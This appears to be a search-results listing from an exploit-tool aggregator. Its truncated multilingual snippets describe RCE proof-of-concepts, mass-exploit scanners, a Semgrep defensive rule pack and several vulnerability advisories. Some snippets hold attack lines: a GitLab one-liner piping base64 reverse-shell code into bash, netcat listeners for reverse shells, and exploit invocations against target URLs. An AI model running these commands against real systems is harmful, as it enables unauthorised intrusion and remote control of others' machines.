8543 matches found
Mass-exploit-CVE-2022-29464
¡Miau Miau Miau! Simplemente un Exploit Masivo basado en un PoC en Python para WSO2 Carbon Server CVE-2022-29464 Error RCE sin autenticación CVE-2022-29464. ¿Miau Miau Miau? ¿Requisitos? Python3 Shodan Zoomeye Un Cerebro ¿Qué es esta herramienta? Esto es un exploit de auto-escaneo masivo de...
CVE-2023-38646
CVE-2023-38646 Herramientas automáticas para el exploit RCE de Metabase conocido como CVE-2023-38646. Lee https://secry.me/explore/news/metabase-rce-cve-2023-38646/ para más información POC, Dork Cómo usar single.py root@kitploit: python3 single.py --url=http://127.0.0.1:8080 --command="curl...
GitLab-preauth-RCE_CVE-2021-22205
GitLab-preauth-RCECVE-2021-22205 single line bash PoC for GitLab preauth RCE CVE-2021-22205 root@kitploit: t="http://vuln.site";cmd='echo xxxbase64ofreverseshellcodexxx |base64 -d|bash';f="1.jpg";echo...
CVE-2021-44077
CVE-2021-44077 CVE-2021-44077 的概念验证利用程序:ManageEngine ServiceDesk Plus msiexec.exe pip install 安装 requirements 文件,或确保已安装 requests 包。 如果你要接收反弹 shell,请先运行你的监听器,例如: root@kitploit: nc -l 4444 然后运行利用脚本,传入 url 和 exe 参数,例如: root@kitploit: python exploit.py http://: 示例脚本输出: root@kitploit: % python...
tangalanga
Tangalanga Zoom 会议扫描器。 该扫描器会随机检查会议 ID,并在可用时返回信息。 安装 首先查看是否有适合当前日期的预编译版本:https://github.com/elcuervo/tangalanga/releases。 这些版本已包含可用的 token。 或者,您可以在 Releases 页面找到 Windows、Linux 和 Mac 版本:https://github.com/elcuervo/tangalanga/releases。 下载、解压即可使用。 用法 以下是所有可用的参数: root@kitploit: tangalanga ...
PKINITtools
PKINIT 工具 本仓库包含一些用于操作 PKINIT 和证书的实用工具。 这些工具基于 minikerberos 和 impacket 构建。相关的博客文章提供更多背景信息:https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/ 安装 这些工具仅兼容 Python 3.5+。从 GitHub 克隆仓库,安装依赖项即可使用: root@kitploit: git clone https://github.com/dirkjanm/PKINITtools pip3 install impacket minikerbero...
CVE-2026-20253
Entorno de Laboratorio CVE-2026-20253 RCE Pre-Auth en Splunk Enterprise a través del Servicio Sidecar de PostgreSQL...
CVE-2023-38646
Metabase Pre Authentication RCE CVE-2023-38646 Hemos proporcionado dos archivos:- CVE-2023-38646-POC.py para comprobar si alguna instancia de Metabase está filtrando el setup-token. CVE-2023-38646-Reverse-Shell.py para obtener una reverse shell en la máquina controlada por el atacante...
auth-header-trust-rules
auth-header-trust-rules 一个小的 Semgrep 规则包,用于标记基于攻击者控制的 HTTP 请求头做出认证、授权或信任决策的代码。 该漏洞类的典型示例是 CVE-2025-29927:Next.js 信任 x-middleware-subrequest 头来决定中间件是否运行,任何提供了精心构造值的入站请求都可以完全跳过中间件。同样的模式在各个框架和生态系统中反复出现。 此规则包涵盖了两种语言系列和该漏洞的三个子类。它旨在作为代码审查辅助工具,而非完全调优的 CI 门禁。规则偏向于召回率而非精确度,最好以交互方式运行,由人工对每个发现做出判断。...
CVE-2025-3243
CVE-2025-32433 Exploit de la librería SSH de Erlang Un exploit de prueba de concepto para CVE-2025-32433 , una vulnerabilidad crítica en la librería SSH de Erlang que permite la ejecución de código sin autenticación previa mediante paquetes SSHMSGCHANNELREQUEST malformados. Características Exploi...
CVE-2022-26134
CVE-2022-26134 CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection Download PoC script root@kitploit: git clone https://github.com/crowsec-edtech/CVE-2022-26134 cd CVE-2022-26134 Run exploit root@kitploit: USE: python3 exploit.py https://target.com CMD Ex: python3 exploit.py...
FULL-ANALYSIS---CVE-2026-45829-ChromaDB-
CVE-2026-45829 - ChromaDB Pre-Auth RCE CVSS 10.0 ⚠️ 警告 本仓库包含针对 CVE-2026-45829 的 功能性 PoC 。 仅限在受控环境中进行授权测试。 描述 ChromaDB(版本 1.0.0 至 1.5.8)中的严重漏洞,允许未经身份验证的攻击者通过从 Hugging Face 加载恶意模型(设置 trustremotecode=true)来执行任意代码。 PoC 的使用 准备监听器 root@kitploit: nc -lvnp 4444...
CVE-2025-32433_Erlang-OTP_PoC
CVE-2025-32433Erlang-OTP 该脚本是一个自定义安全工具,用于检测运行基于Erlang的SSH服务器系统中的关键预认证漏洞。 该脚本是一个自定义安全工具,用于检测运行基于Erlang的SSH服务器系统(例如嵌入式系统、物联网设备和某些后端服务中使用的系统)中的关键预认证漏洞。所测试的漏洞类似于CVE-2025-32433,该漏洞允许在SSH握手阶段进行未认证的远程命令执行。 工作原理 目标枚举: 接受单个IP:端口或从ips.txt和ports.txt中批量获取IP和端口。 逐行匹配IP和端口,以系统化地扫描环境。 SSH协议模拟:...
Cisco Warns of New Zero-Day ISE Auth Bypass (CVSS 10.0) Exploited in Active Attacks
Cisco has warned of a fresh maximum-severity security flaw impacting Identity Services Engine ISE that has come under active exploitation. The vulnerability, tracked as CVE-2026-76460 CVSS score: 10.0, could allow an unauthenticated, remote attacker to bypass authentication. "This vulnerability i...
CVE-2022-3294
Referencia de Exploit: https://github.com/kubernetes/kubernetes/issues/113757 https://github.com/kubernetes/kubernetes/issues/119640 https://github.com/kubernetes/sig-security/blob/main/sig-security-external-audit/security-audit-2021-2022/findings/Kubernetes%20v1.24%20Final%20Report.pdf...
CVE-2026-86710
The Login with QR WordPress plugin through 1.0.0 does not verify that the code used to log a user in is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators...
CVE-2026-86707
The Private Feed Key WordPress plugin through 0.1 does not verify that the key used to authenticate a feed request is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators...
AndroidAuto
Open Android Auto Android Auto 手机端 应用的开源实现。此应用在手机上运行,通过USB将画面投射到汽车头机,替代Google专有的 com.google.android.projection.gearhead APK。 ⚠️ 正在进行中 本项目处于早期开发阶段。协议握手和视频投影已在真实头机上成功运行。手机屏幕可在汽车头机上成功显示约几秒钟后断开(视频稳定性正在改进)。 功能 协议与连接 USB AOA 附件模式检测与连接 TLS 1.2 双向认证(手机作为服务器) 版本协商(协议 v1.7) 服务发现(请求/响应)...
CVE-2026-86710 Login with QR <= 1.0.0 - Unauthenticated Authentication Bypass via 'autologin_code' Parameter
The Login with QR WordPress plugin through 1.0.0 does not verify that the code used to log a user in is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators...
CVE-2026-86707 Private Feed Key <= 0.1 - Unauthenticated Authentication Bypass via 'feedkey' Parameter
The Private Feed Key WordPress plugin through 0.1 does not verify that the key used to authenticate a feed request is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators...